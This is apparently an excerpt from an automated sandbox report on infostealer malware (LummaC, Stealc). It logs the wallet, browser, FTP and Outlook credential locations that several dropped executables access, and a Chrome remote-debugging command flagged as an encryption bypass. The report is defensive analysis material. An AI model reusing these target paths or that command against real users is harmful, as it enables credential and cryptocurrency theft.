                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Tries to steal Mail credentials (via file / registry access)
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: Yara matchFile source: 00000031.00000003.3579214333.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3737049743.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3747345437.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3686997527.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3640935560.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3594359460.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3800189452.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3794953887.0000000000EB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3635862582.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3699711615.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3502366126.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3565383348.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3640504531.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3710394549.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3520649218.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3399514607.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3727950769.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3711429729.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3711095676.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3642838131.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3709485651.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.3363688901.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3511558858.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3499493835.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3560203772.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3640665379.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3396662848.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3710197474.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3712057939.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000003.3668612150.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 4508a44a11.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 6f9ea40b81.exe PID: 7924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: b6866cbf49.exe PID: 7356, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Attempt to bypass Chrome Application-Bound Encryption
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Yara detected Credential Flusher
                          Source: Yara matchFile source: Process Memory Space: 955e8e90f4.exe PID: 7972, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 955e8e90f4.exe PID: 3320, type: MEMORYSTR
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: 6f9ea40b81.exe PID: 7924, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Stealc
                          Source: Yara matchFile source: 00000021.00000002.3470503446.0000000000701000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.3347691049.0000000000701000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.3298144707.000000000139E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000003.3026033423.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.3384712740.000000000146B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.2601702185.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000003.2763862507.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.3268782554.0000000000701000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
